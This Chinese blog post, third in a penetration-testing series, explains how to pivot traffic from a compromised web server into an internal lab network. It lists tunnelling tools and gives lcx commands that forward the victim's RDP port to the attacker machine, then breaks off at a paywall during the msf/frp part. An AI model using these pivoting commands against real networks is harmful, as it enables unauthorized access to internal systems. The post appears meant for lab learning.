渗透测试之内网渗透(三):流量转发

最新推荐文章于 2023-10-12 22:39:17 发布
最新推荐文章于 2023-10-12 22:39:17 发布
阅读量1.5k 收藏 8
点赞数 1
文章标签: 服务器 网络安全 web安全 网络攻击模型 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74131821/article/details/130323123
版权

一、前言

在拿到一台服务器的shell的时候,如果想要更进一步渗透测试,则需要进行内网渗透

而内网渗透的第一步就是挂代理,首先需要明确一个概念,在日常生活中常用vpn挂代理去google查资料,自己搭过vpn的人都知道,要在买的vps上搭建ss的服务器端,之后在自己电脑上下载ss的客户端,确定对应的加密协议和密码就能成功转发

而在内网渗透的流量转发是一个道理,是在拿到shell的服务器上使用工具让它变成代理的服务器端,之后在本机使用客户端工具进行连接

二、流量转发工具

需要放在拿到shell的服务器的服务器端可使用

1.lcx

2.msf

3.cobalt Strike

4.earthworm

5.reGeorg

本地的客户端可以使用

windows

1.proxifier

2.SocksCap64

linux

1.proxychains

三、本次测试的环境

本次环境是公司搭的一个一层内网学习环境,本篇文章只总结流量转发的方法,因此大致介绍下简化的拓扑结构

攻击机:

ip:10.86.0.87 win10(该ip能访问到最外层的DMZ区web服务器)

ip: xx.xx.xx.xx kali (虚拟机,与主机win10 进行NAT连接)

被攻击机:

ip: 172.16.3.145 ,192.168.93.143 web服务器(双网卡,192为内网ip)

ip: 192.168.93.138 内网服务器,上面80有个IIS服务(能访问到该web,则说明代理成功)

明确个概念

那么DMZ区服务器弹shell到kali虚拟机要通过本机做端口映射,kali要访问内网web服务器则代理需要设置成本机的端口

四、lcx转发

本工具只是端口流量转发,并不具备完整的proxy代理功能

举个例子服务器只能本地连3389,因此攻击机连不了,但是可以通过该工具将3389转发到攻击机的端口上,就能连接了

拿到shell后,上传lcx.exe文件

将自身端口流量转发到攻击机端口上

使用方法

本机

接收2333端口来的流量,并在自己的2334端口打开

lcx.exe –listen 2333 2334

目标服务器

将自己的3389的流量转发到10.86.0.87攻击机的2333端口上

lcx.exe -slave 10.86.0.87 2333 127.0.0.1 3389

rdp连接自己的2334端口

本身流量转发

这玩意儿还能在自己的上进行端口转发,比如把3389端口流量转到自己的2333端口

lcx.exe -tran 2333 127.0.0.1 3389

五、msf

msf它本身有流量转发的模块,因为本次的msf是在kali虚拟机里面的,又因为DMZ区服务器是没法访问到kali的,意味着反弹shell是没法直接实现的

在使用msf转发前,使用frp将kali的监听端口映射到本机上

在本机中使用frps服务器端

frps.ini的配置如下,确定绑定的端口,token的值,转发的端口,即可

最低0.47元/天 解锁文章
网络安全大本营
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
frp搭建内流量转发
ithongchou的博客
05-25 251
服务器linux内客户端Windows 10。
渗透测试之内渗透(四):端口转发
m0_74131821的博客
04-26 1922
在真实的错综复杂的企业环境中进行内渗透,涉及内穿透,端口转发,域渗透,提权等一系列的难题
任意端口TCP流量转发工具脚本版本
mingmingge8991的博客
01-02 1401
端口流量转发工具
环境通过iptables实现数据包转发连接互联
qq_46077639的博客
05-11 1102
转自:https://www.jianshu.com/p/cca6e1a3e30b。转自:https://www.jianshu.com/p/cca6e1a3e30b。同样开启路由转发sysctl -w net.ipv4.ip_forward=1.同样开启路由转发sysctl -w net.ipv4.ip_forward=1.开启路由转发: sysctl -w net.ipv4.ip_forward=1。开启路由转发: sysctl -w net.ipv4.ip_forward=1。
EarthWorm(ew):复杂络环境下端口转发及SOCKS5代理工具
ZL_1618的博客
08-14 1819
本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具的使用场景和记住命令;本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。2.动手实践看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;
HCIP(1)
hahaxixi131的博客
07-07 363
1.在windows下,那个命令可以查看进程号与端口号关联 netstat -aon #显示所有的端口占用情况 netstat -aon|findstr “提示的端口” netstat -aon|findstr “80” #查看端口为80的占用情况 2.TCP 3次握手详解 (1)TCP是一种可靠的,面向连接的全双工传输层协议。. TCP连接的建立是一个三次握手的过程。如图所示: (2)主机A(通常也称为客户端)发送一个标识了SYN的数据段,表示期望与服务器A建立连接,此数据段的序列号( se
渗透测试实验报告三
最新发布
12-27
渗透测试实验报告三
计算机病毒与防护:渗透测试之信息收集.ppt
06-10
【计算机病毒与防护:渗透测试之信息收集】 渗透测试是一种模拟黑客攻击行为,以评估和增强络安全性的过程。在这个过程中,信息收集是至关重要的第一步,它涉及到对目标系统的全面了解,以便找出潜在的弱点和切入...
计算机病毒与防护:渗透测试.ppt
06-10
模仿内部员工越权操作 介于上述两者之间极少数人知道,检测应急监控、响应、恢复 渗透测试基础 渗透测试流程 渗透测试基础 渗透测试报告 渗透测试报告 概述 测试综述 安全建议 测试结果 测试目的 测试范围 实施流程 ...
渗透测试实验报告二
12-27
渗透测试实验报告二
渗透测试环境安装包
01-14
渗透测试是信息安全领域的重要环节,它通过模拟黑客攻击手段来评估系统安全性,提前发现并修复潜在漏洞。在这个过程中,一套合适的测试环境至关重要。"渗透测试环境安装包"就是为了这个目的而准备的,它包含...
企业环境渗透 - part1
weixin_49816179的博客
10-12 466
本实验学习到了获取 webshell 的多种方法,例如爆破管理员口令、直接上传木马、利用 SQL 注入向文件中写入一句话木马,或者通过数据库上传文件等多种攻击方式。这种多样性也表明了企业在加强安全意识的必要性,以防止络攻击。本次实验旨在对络安全攻防的认识更加深入,也提高了自身的安全意识和能力。
渗透-做代理流量转发-msf跨段攻击(添加路由表)-Windows中ew和proxifier做代理-kali中ew和proxychains4做代理
BING
05-17 2263
0x01代理-windows中ew和proxifier 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s sscoked -l 8000 2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口 3.设置代理规则 第一步截图: 第二步截图: 第三步截图: 你可以使用代理了 0x02代理-kali中ew和proxychains4做代理 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s
代理转发工具
tomyyyyy
12-09 3681
目录概念区分端口转发端口映射代理隧道端口转发工具概念讲解socket端口转发socks代理两者的异同端口转发常用工具msf反弹木马lcxportmapssh端口转发iptables 端口转发firewall 端口转发socks代理工具基于web服务的socks5工具reGeorgTunna能够进行多层代理的工具Earthworm(又称ew)Termitevenomfuso多功能型的代理工具frp...
渗透-代理篇(reGeorg+Proxifier代理工具)
weixin_41489908的博客
10-19 4390
声明:贝塔安全实验室公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系开白!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!!! START reGeorg+Proxifier代理工具0x01 reGeorg是reDuh的继承者,利用了会话层的socks5协议,结合Proxifier使用效率更高,Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务..
群ping工具_流量转发加速工具Pingtunnel
weixin_39584571的博客
11-28 1445
Pingtunnelpingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具https://github.com/esrrhs/pingtunnel​github.com使用安装服务端首先准备好一个具有公ip的服务器,如AWS上的EC2,假定域名或者公ip是http://www.yourserver.com从releases下载对应的安装包,如pingtunnel...
【工具使用】Xray与Burp联动--流量转发插件Passive Scan Client
qq_50854662的博客
09-24 2077
Burp被动扫描流量转发插件:Passive Scan Client 0x01 插件编译 插件地址:https://github.com/c0ny1/passive-scan-client root@kali:~# git clone https://github.com/c0ny1/passive-scan-client.git root@kali:~# cd passive-scan-client/ root@kali:~/passive-scan-client# mvn package 0x0
渗透msf路由转发
whoim_i的博客
02-29 2955
目录前言拿到反弹shell添加内路由 前言 在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内服务器,为了进一步进行内渗透,我们会利用“沦陷主机”作为跳板进行进一步的内渗透,扩大战果。 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内”的路由,直接使用MSF去访问原本不能直...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值